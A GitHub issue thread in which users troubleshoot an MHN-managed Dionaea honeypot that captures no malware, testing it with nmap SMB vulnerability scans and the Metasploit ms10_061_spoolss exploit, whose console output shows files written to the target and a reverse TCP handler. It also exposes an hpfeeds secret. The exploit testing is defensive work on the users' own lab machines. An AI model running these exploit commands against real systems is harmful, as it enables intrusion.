Open royikle opened 7 years ago
For now I tried two methods but there is nothing in /var/dionaea/binaries/.
Install curl and close UFW. https://github.com/threatstream/mhn/issues/414
nmap --script smb-vuln-ms08-067.nse -p445 {ip} https://github.com/threatstream/mhn/issues/372
Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-05 16:41 CST
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:779: 'smb-vuln-ms08-067.nse' did not match a category, filename, or directory
stack traceback:
[C]: in function 'error'
/usr/bin/../share/nmap/nse_main.lua:779: in function 'get_chosen_scripts'
/usr/bin/../share/nmap/nse_main.lua:1271: in main chunk
[C]: in ?
QUITTING!
Is there any way I can fix this?
I used nmap to check port 445; it is open.
PORT STATE SERVICE VERSION
21/tcp open ftp Dionaea honeypot ftpd
22/tcp open ssh (protocol 2.0)
42/tcp open tcpwrapped
135/tcp open msrpc?
445/tcp open microsoft-ds Dionaea honeypot smbd
1433/tcp open ms-sql-s Dionaea honeypot MS-SQL server
3306/tcp open mysql MySQL 5.0.54
5060/tcp open sip (SIP end point; Status: 200 OK)
5061/tcp open ssl/sip (SIP end point; Status: 200 OK)
Firewall is down.
ubuntu@ubuntu:~$ sudo ufw status
[sudo] password for ubuntu:
Status: inactive
They are my virtual machines using NAT. I want to solve every problem as far as possible before I put it online. So we talk about location. Does that mean some attacks just have a log but will not catch binaries (like nmap -sV -P0 IP)? Maybe I need to use another method to check binaries?
Try this and check whether your honeypot is really vulnerable to the SMB vulnerability MS08-067: nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse {host}
I have had the same issue when deploying via the script in MHN. I manually installed Dionaea and then linked it to MHN for monitoring. Started catching binaries right away.
How did you deploy manually and link to mhn?
-- SmUrF3R5
I followed the install instructions from: HTTPS://github.com/dinotools/dionaea
And linked it via Hpfeeds as described at: https://github.com/threatstream/mhn/wiki/Incorporate-an-already-deployed-Honeypot-into-MHN
Hope this helps!
Thanks for that. I am unclear as to what to put here.
PUBLISH_CHANNELS=
1. Try nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse {host}
ubuntu@ubuntu:~$ nmap -A /usr/share/nmap/scripts/smb-check-vulns.nse 10.20.1.81
Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 11:35 CST
Unable to split netmask from target expression: "/usr/share/nmap/scripts/smb-check-vulns.nse"
ubuntu@ubuntu:/usr/share/nmap/scripts$ nmap -A 10.20.1.81
Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 11:42 CST
Nmap scan report for 10.20.1.81
Host is up (0.0012s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Dionaea honeypot ftpd
...
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 287.36 seconds
No payloads in MHN and no file in /var/dionaea/binaries/.
2. I deployed dionaea with the MHN deploy script. I don't know how to link it to mhn, so I just used the script to install. It will link to mhn automatically, I think. Won't it?
3. About linking to hpfeeds: my problem is bigger than @SmUrF3R5's. I just know IDENT is the UUID from MHN. I have no idea where I can find SECRET and PUBLISH_CHANNELS. Is SECRET in dionaea.conf?
Check the installation directory of nmap and find out the scripts that are related to SMB vulnerabilities.
Dionaea gets the payload on 445. The nmap scanner is only for testing your setup; to upload the malware sample you have to use tools like Metasploit.
I checked the path /usr/share/nmap/scripts and found a smb-check-vulns.nse file.
So the file is there but the command can't run.
Is there any command to do the same thing?
I tried this command.
ubuntu@ubuntu:~$ nmap -A --script=smb-check-vulns.nse 10.20.1.81
The /var/dionaea/binaries/ is still empty.
My command seems to work.
Is smb-check-vulns.nse not Metasploit?
I'm not good at Metasploit.
I can open the Armitage tool in Kali but don't really understand what every attack means.
Can someone recommend a keyword for Metasploit that I can google by myself?
Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 15:15 CST
Nmap scan report for 10.20.1.81
Host is up (0.011s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Dionaea honeypot ftpd
22/tcp open ssh (protocol 2.0)
42/tcp open tcpwrapped
135/tcp open msrpc?
445/tcp open microsoft-ds Dionaea honeypot smbd
1433/tcp open ms-sql-s Dionaea honeypot MS-SQL server
3306/tcp open mysql MySQL 5.0.54
5060/tcp open sip (SIP end point; Status: 200 OK)
5061/tcp open ssl/sip (SIP end point; Status: 200 OK)
...
Host script results:
| smb-check-vulns:
| MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|_ MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.94 seconds
Add this argument to your nmap command: --script-args=unsafe=1, like this:
nmap -A --script=smb-check-vulns.nse --script-args=unsafe=1 10.20.1.81
because as per the nmap output your system looks clean, which means your configuration is not valid.
Try the command and share the output.
OK, I tried the command.
nmap -A --script=smb-check-vulns.nse --script-args=unsafe=1 10.20.1.81
The /var/dionaea/binaries/ is empty.
Here is the output.
It seems I can try the MS08-067 threat?
Starting Nmap 6.40 ( http://nmap.org ) at 2017-06-07 16:56 CST
Nmap scan report for 10.20.1.81
Host is up (0.0020s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Dionaea honeypot ftpd
22/tcp open ssh (protocol 2.0)
42/tcp open tcpwrapped
135/tcp open msrpc?
445/tcp open microsoft-ds Dionaea honeypot smbd
1433/tcp open ms-sql-s Dionaea honeypot MS-SQL server
3306/tcp open mysql MySQL 5.0.54
5060/tcp open sip (SIP end point; Status: 200 OK)
5061/tcp open ssl/sip (SIP end point; Status: 200 OK)
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NOT VULNERABLE
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 340.23 seconds
Your configuration looks fine, as MS08-067 is vulnerable, so use Metasploit to upload the exploit to your dionaea using the following.
https://docs.google.com/document/d/1Lg5q-NL38mjbwYHYP4cGrGZ5baY4etB0-BdWPie2xVw/edit?usp=sharing
ubuntu@ubuntu:~$ msfconsole
msfconsole: command not found
So I need to install Metasploit Framework first, right? I will try it tomorrow!
Sorry for yesterday, I just had something important. First I used the script from the Google doc.
msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > set LPORT 4444
LPORT => 4444
msf exploit(ms10_061_spoolss) > set PNAME XPSPrinter
PNAME => XPSPrinter
msf exploit(ms10_061_spoolss) > set LHOST 192.168.216.144
LHOST => 192.168.216.144
msf exploit(ms10_061_spoolss) > set RHOST 192.168.216.144
RHOST => 192.168.216.144
msf exploit(ms10_061_spoolss) > show options
Module options (exploit/windows/smb/ms10_061_spoolss):
Name Current Setting Required Description
---- --------------- -------- -----------
PNAME XPSPrinter no The printer share name to use on the target
RHOST 192.168.216.144 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE spoolss no The named pipe for the spooler service
Exploit target:
Id Name
-- ----
0 Windows Universal
msf exploit(ms10_061_spoolss) > exploit
[*] Started reverse TCP handler on 192.168.216.144:4444
[*] 192.168.216.144:445 - Trying target Windows Universal...
[*] 192.168.216.144:445 - Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.216.144[\spoolss] ...
[-] 192.168.216.144:445 - Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
Maybe it's not a good idea to scan Dionaea from itself. I will create a new VM and try again.
I just used the other VM to try this.
msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > set LPORT 4444
LPORT => 4444
msf exploit(ms10_061_spoolss) > set PNAME XPSPrinter
PNAME => XPSPrinter
msf exploit(ms10_061_spoolss) > set LHOST 192.168.216.139
LHOST => 192.168.216.139
msf exploit(ms10_061_spoolss) > set RHOST 192.168.216.144
RHOST => 192.168.216.144
msf exploit(ms10_061_spoolss) > show options
Module options (exploit/windows/smb/ms10_061_spoolss):
Name Current Setting Required Description
---- --------------- -------- -----------
PNAME XPSPrinter no The printer share name to use on the target
RHOST 192.168.216.144 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE spoolss no The named pipe for the spooler service
Exploit target:
Id Name
-- ----
0 Windows Universal
msf exploit(ms10_061_spoolss) > exploit
[*] Started reverse TCP handler on 192.168.216.139:4444
[*] 192.168.216.144:445 - Trying target Windows Universal...
[*] 192.168.216.144:445 - Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.216.144[\spoolss] ...
[*] 192.168.216.144:445 - Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.216.144[\spoolss] ...
[*] 192.168.216.144:445 - Attempting to exploit MS10-061 via \\192.168.216.144\XPSPrinter ...
[*] 192.168.216.144:445 - Printer handle: 0000000000000000000000000000000000000000
[*] 192.168.216.144:445 - Job started: 0x3
[*] 192.168.216.144:445 - Wrote 73802 bytes to %SystemRoot%\system32\eb1czUt1c1YZ0v.exe
[*] 192.168.216.144:445 - Job started: 0x3
[*] 192.168.216.144:445 - Wrote 2233 bytes to %SystemRoot%\system32\wbem\mof\mu4JkthYhxiKjN.mof
[-] 192.168.216.144:445 - Exploit failed: NoMethodError undefined method `unpack' for nil:NilClass
[*] Exploit completed, but no session was created.
msf exploit(ms10_061_spoolss) > sqlite3 /var/dionaea/logsql.sqlite
[-] Unknown command: sqlite3.
msf exploit(ms10_061_spoolss) > select * from download;
[-] Unknown command: select.
msf exploit(ms10_061_spoolss) > ls -l /var/dionaea/binaries/
[*] exec: ls -l /var/dionaea/binaries/
ls: cannot access /var/dionaea/binaries/: No such file or directory
There are two files in /var/dionaea/binaries/: 415454e80e4ebc341928b6f5b89d251d and spoolss-2hhwq5zi.tmp.
And dionaea payloads in MHN are still empty. I installed this dionaea using the MHN deploy script. Does that mean I have a problem with dionaea connecting to MHN?
You have to run the sqlite3 commands on the sensor, not in Metasploit, and the SQL query in the sqlite3 console. You have to check the hpfeeds section of the dionaea configuration: is it proper?
ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select * from download;
Error: no such table: download
ubuntu@ubuntu:~$ ls -l /var/dionaea/binaries/
total 152
-rw------- 2 nobody nogroup 73802 Jun 8 15:14 415454e80e4ebc341928b6f5b89d251d
-rw------- 2 nobody nogroup 73802 Jun 8 15:14 spoolss-2hhwq5zi.tmp
I used the script in MHN to find out dionaea's configuration.
mongo hpfeeds
> db.auth_key.find()
{ "_id" : ObjectId("59350aad1d41c805e59d6091"), "subscribe" : [ ], "secret" : "Qa8EsgaruZZezlVZ", "identifier" : "1919e7aa-49c2-11e7-b60b-000c2940d5f9", "publish" : [ "mwbinary.dionaea.sensorunique", "dionaea.capture", "dionaea.capture.anon", "dionaea.caputres", "dionaea.connections" ] }
And I checked the dionaea.conf file on the dionaea sensor in /etc/dionaea.
hpfeeds = {
hp1 = {
server = "10.20.1.xx"
port = "10000"
ident = "1919e7aa-49c2-11e7-b60b-000c2940d5f9"
secret = "Qa8EsgaruZZezlVZ"
// dynip_resolve: enable to lookup the sensor ip through a webservice
dynip_resolve = "http://queryip.net/ip/"
}
}
The server is my MHN IP, and ident and secret look OK. I checked the port status.
MHN
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.4.6 (Ubuntu)
3000/tcp open http-proxy sslstrip
8181/tcp open tcpwrapped
10000/tcp open snet-sensor-mgmt?
Dionaea
PORT STATE SERVICE VERSION
21/tcp open ftp Dionaea honeypot ftpd
22/tcp open ssh (protocol 2.0)
42/tcp open tcpwrapped
135/tcp open msrpc?
445/tcp open microsoft-ds Dionaea honeypot smbd
1433/tcp open ms-sql-s Dionaea honeypot MS-SQL server
3306/tcp open mysql MySQL 5.0.54
5060/tcp open sip (SIP end point; Status: 200 OK)
5061/tcp open ssl/sip (SIP end point; Status: 200 OK)
Does port 10000 also need to be open on dionaea?
Use the query select * from downloads.
Also test your mhn machine: are all the services running?
sudo supervisorctl status, sudo supervisorctl restart all
No, it's the server port; the client port could be any.
OK, mhn-celery-worker is really FATAL. I tried to start it now using the MHN Troubleshooting Guide. So I need to do the actions in the google doc again, right?
ubuntu@ubuntu:/var/log/mhn$ sudo supervisorctl status
geoloc RUNNING pid 2882, uptime 0:07:53
honeymap RUNNING pid 2898, uptime 0:07:51
hpfeeds-broker RUNNING pid 2867, uptime 0:07:53
mhn-celery-beat RUNNING pid 2866, uptime 0:07:53
mhn-celery-worker RUNNING pid 2984, uptime 0:00:16
mhn-collector RUNNING pid 2897, uptime 0:07:51
mhn-uwsgi RUNNING pid 2887, uptime 0:07:52
mnemosyne RUNNING pid 2875, uptime 0:07:53
And very sorry, I don't really know how to query select * from downloads. Is the script like this?
sqlite> query select * from downloads.
...> ls -l /var/dionaea/binaries/
...>
Why do you want dionaea, what is your purpose? And don't write query before select, and put ; at the end.
Was mhn-celery-worker fatal before the restart?
Yes, mhn-celery-worker was fatal before the restart.
I will put dionaea online; before that I need to know what will happen as much as I can. And I need to answer every question from other co-workers about MHN, even if it's just a part of the sensor. For this case, I want to know how dionaea payloads work and what information will be output.
You have payloads on the mhn dashboard now? OK.
No, there is nothing on the payloads page. It's really odd. I will try to reinstall MHN and dionaea. Maybe there were too many changes to them and something had a bad effect. I had a timestamp problem before and the final solution was that MHN had something broken. I reinstalled MHN and did the same thing, and the problem was fixed (#405). So I hope this time it is the same situation.
After reinstall:
ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select * from download;
Error: no such table: download
I have no idea about it. Can someone let me know what the information looks like on the dionaea.capture page? I can't create it myself, so I want to know what will be there at least. Or does someone still have a solution to teach me?
First of all, the table is downloads, not download. Try to upload the malware samples again from Metasploit; every service should be running. The download page of mhn just shows the hashes.
ubuntu@ubuntu:~$ sudo supervisorctl status
[sudo] password for ubuntu:
geoloc RUNNING pid 1494, uptime 3:22:18
honeymap RUNNING pid 1506, uptime 3:22:18
hpfeeds-broker RUNNING pid 1492, uptime 3:22:18
mhn-celery-beat RUNNING pid 1491, uptime 3:22:18
mhn-celery-worker RUNNING pid 1498, uptime 3:22:18
mhn-collector RUNNING pid 1499, uptime 3:22:18
mhn-uwsgi RUNNING pid 1495, uptime 3:22:18
mnemosyne RUNNING pid 1493, uptime 3:22:18
msf exploit(ms10_061_spoolss) > exploit
[*] Started reverse TCP handler on 192.168.216.139:4444
[*] 10.20.1.xx:445 - Trying target Windows Universal...
[*] 10.20.1.xx:445 - Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:10.20.1.xx[\spoolss] ...
[*] 10.20.1.xx:445 - Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:10.20.1.xx[\spoolss] ...
[*] 10.20.1.xx:445 - Attempting to exploit MS10-061 via \\10.20.1.xx\XPSPrinter ...
[*] 10.20.1.xx:445 - Printer handle: 0000000000000000000000000000000000000000
[*] 10.20.1.xx:445 - Job started: 0x3
[*] 10.20.1.xx:445 - Wrote 73802 bytes to %SystemRoot%\system32\25sOBX2ew81reE.exe
[*] 10.20.1.xx:445 - Job started: 0x3
[*] 10.20.1.xx:445 - Wrote 2241 bytes to %SystemRoot%\system32\wbem\mof\Pd0IItuyiKmnp6.mof
[-] 10.20.1.xx:445 - Exploit failed: NoMethodError undefined method `unpack' for nil:NilClass
[*] Exploit completed, but no session was created.
3. Files in /var/dionaea/binaries/
4. Use SQLite.
The script here always confuses me.
I think my script here may be incorrect again?
I just ran them, but nothing.
ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select * from downloads;
1|1|spoolss://::ffff:10.20.1.87|cefe8ca77a7fd5335f497446fe26bb58
2|2|spoolss://::ffff:10.20.1.87|1748bf1d4633c8cfec746e207b725bb4
sqlite> ls -l /var/dionaea/binaries/
...>
5. Attack page have log but dionaea.capture in payloads get nothing.
Brother, in sqlite you have to just run the SQL queries; ls -l /var/dionaea/binaries/ is a Linux command.
Sorry bro, I'm really not good at SQL. Can you teach me how to do SQL queries? I just got here and I don't know what's next.
ubuntu@ubuntu:~$ sqlite3 /var/dionaea/logsql.sqlite
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select * from downloads;
1|1|spoolss://::ffff:10.20.1.87|cefe8ca77a7fd5335f497446fe26bb58
2|2|spoolss://::ffff:10.20.1.87|1748bf1d4633c8cfec746e207b725bb4
I have sent the mail. Really, thanks for your help.
Did you ever get the uploads showing on the payloads page? How did you resolve the issue? I have a Dionaea instance that is catching malware, my hpfeed is sending data to MHN, but there is nothing showing up in payloads. Thanks!
I could see files in /var/dionaea/binaries/ and the connection between mhn and dionaea is no problem; all services are running. But after I upload with metasploit, the payloads page shows nothing. Is your situation like mine?
I did actually get it working. I updated curl to version 7.50 and installed MHN as root. Everything is working great now.
I wrote up what I did in a blog post found here: https://www.attacusatlas.com/how-to-set-up-dionaea-honeypot-with-modern-honey-network-and-slack-alerts/
Hope it helps!
Thanks!! I will check the blog and try again.
You installed MHN using sudo as root; this is what I do. So maybe the difference is the curl version, I will check it.
I just wanted to say that the article @JBAnderson wrote is excellent. I already had an MHN install working, along with one sensor that was reporting attacks, all with Splunk integration too. But I wasn't capturing malware binaries like most users.
After reading @JBAnderson's article I now have a sensor running and capturing malware. It took about 30 mins before I captured the wanna_cry ransomware. Kudos @JBAnderson for the hard work!
So everyone can use the mhn payloads page to show malware information now, except me. I also followed @JBAnderson's blog parts 1 and 2 and used ms10_061_spoolss to test. Nothing changed. I can get attack logs in my mhn but payloads are still nothing. The binaries folder has the spoolss file and all services are up.
Should I try to install Splunk or ELK? Is it related to the mhn payloads page?
@royikle ELK and splunk are unrelated to your issue.
The most likely place to look I think is where you set up the HPFeeds user. The publish channels need to be exactly:
"dionaea.connections,dionaea.capture,mwbinary.dionaea.sensorunique,dionaea.caputres,dionaea.capture.anon"
(even though it looks like there's a typo in one of them)
It sounds like you are getting the "dionaea.connections" messages but not the others.
Lemme know!
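As an added example (not part of the thread or of MHN), a small Python check that compares the hpfeeds block from dionaea.conf with the auth_key document from MHN's mongo shell, reporting ident/secret mismatches and any publish channel missing from or extra to the list above. The sample inputs are the ones posted earlier in this thread; the variant with one channel removed is constructed to show what a mismatch looks like.

```python
import json
import re

# Publish channels that, per JBAnderson's comment above, the HPFeeds user must
# have exactly (including the "dionaea.caputres" spelling MHN expects).
REQUIRED_PUBLISH = {
    "dionaea.connections",
    "dionaea.capture",
    "mwbinary.dionaea.sensorunique",
    "dionaea.caputres",
    "dionaea.capture.anon",
}

# Sample copied from the dionaea.conf posted in this thread (the server address
# is the placeholder the poster used).
SAMPLE_DIONAEA_CONF = """
hpfeeds = {
    hp1 = {
        server = "10.20.1.xx"
        port = "10000"
        ident = "1919e7aa-49c2-11e7-b60b-000c2940d5f9"
        secret = "Qa8EsgaruZZezlVZ"
        dynip_resolve = "http://queryip.net/ip/"
    }
}
"""

# Sample copied from the db.auth_key.find() output in this thread. It is mongo
# shell output, not strict JSON, hence the ObjectId(...) wrapper.
SAMPLE_AUTH_KEY = (
    '{ "_id" : ObjectId("59350aad1d41c805e59d6091"), "subscribe" : [ ], '
    '"secret" : "Qa8EsgaruZZezlVZ", '
    '"identifier" : "1919e7aa-49c2-11e7-b60b-000c2940d5f9", '
    '"publish" : [ "mwbinary.dionaea.sensorunique", "dionaea.capture", '
    '"dionaea.capture.anon", "dionaea.caputres", "dionaea.connections" ] }'
)

# Constructed variant with one channel missing, to show what the check reports.
BROKEN_AUTH_KEY = SAMPLE_AUTH_KEY.replace(', "dionaea.connections"', "")


def parse_dionaea_hpfeeds(conf_text):
    """Return the quoted key = "value" pairs inside the hpfeeds block of dionaea.conf."""
    block = re.search(r"hpfeeds\s*=\s*\{(.*)\}", conf_text, re.S)
    if block is None:
        raise ValueError("no hpfeeds block in dionaea.conf")
    return dict(re.findall(r'(\w+)\s*=\s*"([^"]*)"', block.group(1)))


def parse_mongo_auth_key(doc_text):
    """Turn a mongo-shell auth_key document into a dict; ObjectId("x") becomes "x"."""
    as_json = re.sub(r'ObjectId\("([0-9a-f]+)"\)', r'"\1"', doc_text)
    return json.loads(as_json)


def check_hpfeeds_link(conf_text, auth_key_text, required=REQUIRED_PUBLISH):
    """Compare the sensor side (dionaea.conf) with the broker side (auth_key).

    Returns a list of human-readable problems; an empty list means the ident and
    secret agree and the publish list is exactly the required set.
    """
    sensor = parse_dionaea_hpfeeds(conf_text)
    broker = parse_mongo_auth_key(auth_key_text)
    problems = []
    if sensor.get("ident") != broker.get("identifier"):
        problems.append("ident mismatch: sensor has %r, broker has %r"
                        % (sensor.get("ident"), broker.get("identifier")))
    if sensor.get("secret") != broker.get("secret"):
        problems.append("secret in dionaea.conf does not match auth_key")
    published = set(broker.get("publish", []))
    for channel in sorted(required - published):
        problems.append("broker does not allow publishing to %s" % channel)
    for channel in sorted(published - required):
        problems.append("unexpected publish channel %s" % channel)
    return problems


if __name__ == "__main__":
    print(check_hpfeeds_link(SAMPLE_DIONAEA_CONF, SAMPLE_AUTH_KEY) or "sensor and broker agree")
    print(check_hpfeeds_link(SAMPLE_DIONAEA_CONF, BROKEN_AUTH_KEY))
```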
Thanks for your answer @JBAnderson.
I checked my mhn hpfeeds.
It seems good.
Does the VirtualBox network being set to bridge affect it?
> db.auth_key.find({identifier: "7c5709e2-769f-11e7-a4de-08002786e5ea"}) { "_id" : ObjectId("59804ff531eddd0543c86aa5"), "subscribe" : [ ], "secret" : "FFffF*************", "identifier" : "7c5709e2-769f-11e7-a4de-***********", "publish" : [ "dionaea.connections", "dionaea.capture", "mwbinary.dionaea.sensorunique", "dionaea.caputres", "dionaea.capture.anon" ] }
I had MHN with Dionaea running for a week before I started to see payload captures. Not sure if the nmap script or Metasploit really sends a malicious file to 445 (SMB). If they just exploit and send the payload to memory, I don't think Dionaea can capture it.
Nmap sends no payloads, it just scans dionaea. But using ms10_061_spoolss to exploit dionaea, we can check the payload file in the Binaries folder. If they just sent the payload to memory, the file would disappear after restarting the VM. So I think spoolss should be captured, but the problem is why can't I show the message in MHN.
@JBAnderson, great advice on the Dionaea setup. I added another sensor following your instructions and now I got a Wannacry sample :D
@suwitcham, does the sample show on the MHN payloads page? Or in the Dionaea Binaries folder? If you can show it on MHN, I am the only one who can't show it on payloads.
It shows on both the MHN payloads page for dionaea and under the binaries folder of dionaea itself.
Everybody follows @JBAnderson's article and only I can't show it. It seems the MHN & dionaea settings are good. Does that mean maybe the problem is the VM setting, firewall? But it just sends a log to MHN; is it possible for that to be blocked?
Let's take it as two separate issues. Dionaea itself also works standalone. If you can see anything in the Dionaea log, then something is wrong with it by itself.
I can see the malicious file (spoolss) in the Binaries folder. And I can see attack logs in dionaea. So I think dionaea is working.
@royikle try the following from the troubleshooting wiki:
Out of the box, mnemosyne filters out attacks coming from RFC1918 addresses, so you need to configure it not to do so. Here are the steps:
As root, run these commands.
cd /opt/mnemosyne/
git fetch origin
git stash
git merge origin/master
git stash pop
Now, edit mnemosyne.cfg and append this to the end of the file.
[normalizer]
ignore_rfc1918 = False
Lastly, run this command:
supervisorctl restart mnemosyne
Then run:
supervisorctl status
You should see something like this:
geoloc RUNNING pid 16719, uptime 1:25:31
honeymap RUNNING pid 17223, uptime 0:30:29
hpfeeds-broker RUNNING pid 980, uptime 10 days, 5:19:51
mhn-celery-beat RUNNING pid 961, uptime 10 days, 5:19:51
mhn-celery-worker RUNNING pid 14878, uptime 3:44:43
mhn-uwsgi RUNNING pid 9580, uptime 9 days, 3:46:32
mnemosyne RUNNING pid 17749, uptime 0:05:26
Hi all,
I'm testing the dionaea sensor. MHN is a very nice tool; it's easy to install dionaea. I use nmap to scan my dionaea, and I can get events on the MHN Attacks page.
But here is a question: the payloads page with dionaea.capture does not display any log. Reviewing the past issues, I think the point is that there is nothing in /var/dionaea/binaries/. How can I create something in the binaries folder?